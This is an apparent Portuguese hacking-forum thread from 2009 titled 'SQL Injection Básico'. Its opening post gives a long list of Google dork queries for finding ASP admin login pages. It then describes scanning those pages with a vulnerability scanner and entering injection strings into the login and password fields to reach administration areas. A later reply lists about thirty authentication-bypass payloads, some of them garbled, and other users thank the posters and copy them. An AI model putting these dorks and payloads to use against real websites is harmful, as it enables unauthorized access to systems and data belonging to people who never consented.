Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

SQL Injection Básico

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Tutorial SQL Injection Básico

    SQL Injection é um ataque no qual um código sql é inserido dentro de uma query em um site, permitindo ao atacante obter dados importantes ou acesso a áreas restritas de sites.

    Primeiramente ache um site vulneravel para isso use o google,use umas das strings abaixo:

    allinurl:admin/index.asp
    allinurl:admin/default.asp
    allinurl:admin/admin.asp
    allinurl:admin/login.asp
    allinurl:/admin/entrar.asp
    allinurl:/admin/default.asp
    allinurl:/admin/index.asp
    allinurl:/admin/login.asp
    allinurl:/admin/password.asp
    allinurl:/admin/senha.asp
    allinurl:/login/login.asp
    allinurl:/adm/default.asp
    allinurl:/login/index.asp
    allinurl:/login/default.asp
    allinurl:/webmaster/login.asp
    allinurl:/webadmin/default.asp
    allinurl:/webadmin/index.asp
    allinurl:/webadmin/default.asp
    allinurl:/menu_admin/default.asp
    allinurl:/menu_admin/index.asp
    allinurl:/menu_admin/login.asp
    allinurl:/noticias/admin/
    allinurl:/news/admin/
    allinurl:/cadastro/admin/
    allinurl:/portal/admin/
    allinurl:/site/admin/
    allinurl:/home/admin.asp
    allinurl:/home/admin/index.asp
    allinurl:/home/admin/default.asp
    allinurl:/home/admin/login.asp
    allinurl:/web/admin/index.asp
    allinurl:/web/admin/default.asp
    allinurl:/web/admin/login.asp
    allinurl:/home/adm/login.asp
    allinurl:/home/adm/senha.asp
    allinurl:/home/adm/index.asp
    allinurl:/home/adm/defaul.asp
    allinurl:/menu/admin/index.asp
    allinurl:/menu/admin/default.asp
    allinurl:/menu/admin/login.asp
    allinurl:/menu/admin/admin.asp
    allinurl:/painel/admin/admin.asp
    allinurl:/painel/admin/login.asp
    allinurl:/painel/admin/index.asp
    allinurl:/painel/admin/default.asp
    allinurl:/site/admin/default.asp
    allinurl:/site/admin/index.asp
    allinurl:/site/admin/login.asp
    allinurl:/asp/admin/login.asp
    allinurl:/asp/admin/index.as
    allinurl:/adm/login.asp
    allinurl:/adm/index.asp
    allinurl:/adm/default.asp
    allinurl:/login/index.asp
    allinurl:/pedidos/admin/index.asp
    allinurl:/pedidos/admin/login.asp
    allinurl:/compras/admin/
    allinurl:/clientes/admin/
    allinurl:/busines/admin/
    allinurl:/area_restrita/admin.asp
    allinurl:/area_restrita/login.asp
    allinurl:/area_restrita/index.asp
    allinurl:/acesso/admin.asp
    allinurl:/acesso/admin/default.asp
    allinurl:/acesso/admin/index.asp
    allinurl:/post/admin/default.asp
    allinurl:/post/admin/
    allinurl:/post/admin/index.asp
    allinurl:/post/admin/login.asp
    allinurl:/eshop/admin/
    allinurl:/eshop/admin.asp
    allinurl:/eshop/admin/default.asp
    allinurl:/eshop/admin/index.asp
    allinurl:/comercio/admin.asp
    allinurl:/comercio/admin/default.asp
    allinurl:/comercio/admin/index.asp
    allinurl:/news/admin/login.asp
    allinurl:/news/admin/default.asp
    allinurl:/news/admin/index.asp
    allinurl:/imprensa/login.asp
    allinurl:/imprensa/admin.asp
    allinurl:/imprensa/admin/default.asp

    Pegue uma das strings acima e pesquise a vontade:



    Após isso saira uma lista de sites com paginas com campos de logins e senhas
    ate ai tudo bem agora vamos escaniialos usando um scanner como acutinex
    depois de scanniado e acuzando a suposta vulnerabilidade de sql injection

    É só testarmos strings nos campos de loginsda pagina afetada.



    OBS: A mesma string usada no login deve ser usada no campo de senha ok.

    Teste varias strings até acertar uma que de uma confusao no banco de dados do servidor.
    Assim te dando acesso a pagina da adiministração....Flw ae galera!!!
    Last edited by 5ubzer0; 08-12-2009, 13:13.
    Gostou do post? Clique em

    Similar Threads
    Tags: sql injection básico
    • Top
  • Font Size
    #2
    will27br,

    Opssssssssss muito bom tenho algumas aqui...

    Vlw por compartilhar...

    Forte abraço.

    Atenciosamente,
    Equilibrio
    • Top

    Comment

    • Font Size
      #3
      Esqueci galera****

      A mesma string usada no login deve ser usada no campo de senha ok.
      abaixo uma lista de strings:

      * b’ or ‘ 1=’
      * ‘ or ‘1
      * ‘ or ‘|
      * ‘ or ‘a’='a
      * ‘ or ”=’
      * ‘ or 1=1–
      * ‘) or (’a'=’a
      * ‘ or ‘1′=’1
      * admin ‘ – -
      * ‘ ou 0=0 –
      * “ou 0=0 –
      * ou 0=0 –
      * ‘ ou 0=0 #
      * “ou 0=0 #
      * ou 0=0 #
      * ‘ ou ‘ x’='x
      * “ou” x”=”x
      * ‘) ou (’ x’='x
      * ‘ ou 1=1 –
      * “ou 1=1 –
      * ou 1=1 –
      * ‘ ou a=a –
      * “ou” a”=”a
      * ‘) ou (’ a’='a
      * “) ou (”a”=”a
      * hi “ou” a”=”a
      * hi “ou 1=1 –
      * hi ‘ ou 1=1 –
      * hi ‘ ou ‘ a’='a
      * hi ‘) ou (’ a’='a
      * hi”) ou (”a”=”a
      * ‘ or ‘x’='x
      Gostou do post? Clique em

      • Top

      Comment

      • Font Size
        #4
        Bem explicado,vou salvar as strings aqui.vlw
        • Top

        Comment

        • Font Size
          #5
          Muito bom mesmo!.... o problema é conseguir acessar 1 mais sou brasileiro nao desisto nunca!
          • Top

          Comment

          • Font Size
            #6
            cara, muuitoo bom
            kkk
            brasileiro nunca desiste
            .
            NÃO ME RESPONSABILIZO PELOS SEUS ATOS!

            Ajude o GH : |Recrutamento de Divulgadores |Doação| Camisa Guia Do Hacker|


            |Rádio GH||Regras e Termos de Uso|SEGURANÇA GH|

            sigpic


            • Top

            Comment

            • Font Size
              #7
              CTRL+C nas Strings ^^

              valeeu mah
              • Top

              Comment

              • Font Size
                #8
                boa mano, tem várias ai que eu nao tinha! vlw xD
                • Top

                Comment

                Anterior template Avançar
                X
                Working...
                X